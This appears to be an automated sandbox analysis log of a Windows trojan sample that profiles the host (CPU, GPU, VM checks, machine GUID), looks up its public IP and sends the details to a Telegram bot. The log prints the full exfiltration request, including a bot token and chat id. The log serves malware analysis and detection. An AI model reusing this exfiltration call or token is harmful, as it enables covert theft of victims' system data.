Click to jump to signature section
Source: xYWm6BV3NZ.exe | ReversingLabs: Detection: 69% |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49758 version: TLS 1.2 |
Source: xYWm6BV3NZ.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA |
Source: | Binary string: \Amongus\Amongus\obj\Debug\Amongus.pdb source: xYWm6BV3NZ.exe |
Source: unknown | DNS query: name: api.telegram.org |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | DNS query: name: ip-api.com |
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: global traffic | HTTP traffic detected: GET /bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=1704933594&text=CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%202F7CW8A1%0AIP:%20102.129.143.61 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /line?fields=query HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1 |
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758 |
Source: xYWm6BV3NZ.exe, 00000000.00000002.367818391.00000000031B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org |
Source: xYWm6BV3NZ.exe, 00000000.00000002.367587681.00000000012F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmp, xYWm6BV3NZ.exe, 00000000.00000002.367791831.000000000318C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com |
Source: xYWm6BV3NZ.exe | String found in binary or memory: http://ip-api.com/line?fields=query |
Source: xYWm6BV3NZ.exe, 00000000.00000002.367800472.0000000003196000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com4m( |
Source: xYWm6BV3NZ.exe, 00000000.00000002.367791831.000000000318C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org |
Source: xYWm6BV3NZ.exe | String found in binary or memory: https://api.telegram.org/bot |
Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=17049 |
Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4m |
Source: unknown | DNS traffic detected: queries for: ip-api.com |
Source: global traffic | HTTP traffic detected: GET /bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=1704933594&text=CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%202F7CW8A1%0AIP:%20102.129.143.61 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /line?fields=query HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49758 version: TLS 1.2 |
Source: xYWm6BV3NZ.exe, 00000000.00000000.357891321.0000000000C24000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAmongus.exe0 vs xYWm6BV3NZ.exe |
Source: xYWm6BV3NZ.exe | Binary or memory string: OriginalFilenameAmongus.exe0 vs xYWm6BV3NZ.exe |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Code function: 0_2_014D6388 | 0_2_014D6388 |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Code function: 0_2_014DA578 | 0_2_014DA578 |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Code function: 0_2_014D6C58 | 0_2_014D6C58 |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Code function: 0_2_014D6040 | 0_2_014D6040 |
Source: xYWm6BV3NZ.exe | ReversingLabs: Detection: 69% |
Source: xYWm6BV3NZ.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll | Jump to behavior |
Source: unknown | Process created: C:\Users\user\Desktop\xYWm6BV3NZ.exe "C:\Users\user\Desktop\xYWm6BV3NZ.exe" |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4984:120:WilError_01 |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xYWm6BV3NZ.exe.log | Jump to behavior |
Source: classification engine | Classification label: mal68.troj.evad.winEXE@2/1@2/2 |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: xYWm6BV3NZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR |
Source: xYWm6BV3NZ.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA |
Source: xYWm6BV3NZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: | Binary string: \Amongus\Amongus\obj\Debug\Amongus.pdb source: xYWm6BV3NZ.exe |
Source: xYWm6BV3NZ.exe | Static PE information: 0xEC3D810A [Sat Aug 6 07:21:46 2095 UTC] |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe TID: 4624 | Thread sleep time: -30000s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe TID: 4708 | Thread sleep time: -922337203685477s >= -30000s | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: xYWm6BV3NZ.exe, 00000000.00000002.367537088.00000000012BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware |
Source: xYWm6BV3NZ.exe, 00000000.00000002.367537088.00000000012BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareHCTPPLVWWin32_VideoControllerKHXN9NGVVideoController120060621000000.000000-00043896118display.infMSBDA2F7CW8A1PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsR91LPH4R |
Source: xYWm6BV3NZ.exe, 00000000.00000002.367537088.00000000012BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Process token adjusted: Debug | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Memory allocated: page read and write | page guard | Jump to behavior |
Source: Yara match | File source: xYWm6BV3NZ.exe, type: SAMPLE |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Queries volume information: C:\Users\user\Desktop\xYWm6BV3NZ.exe VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid | Jump to behavior |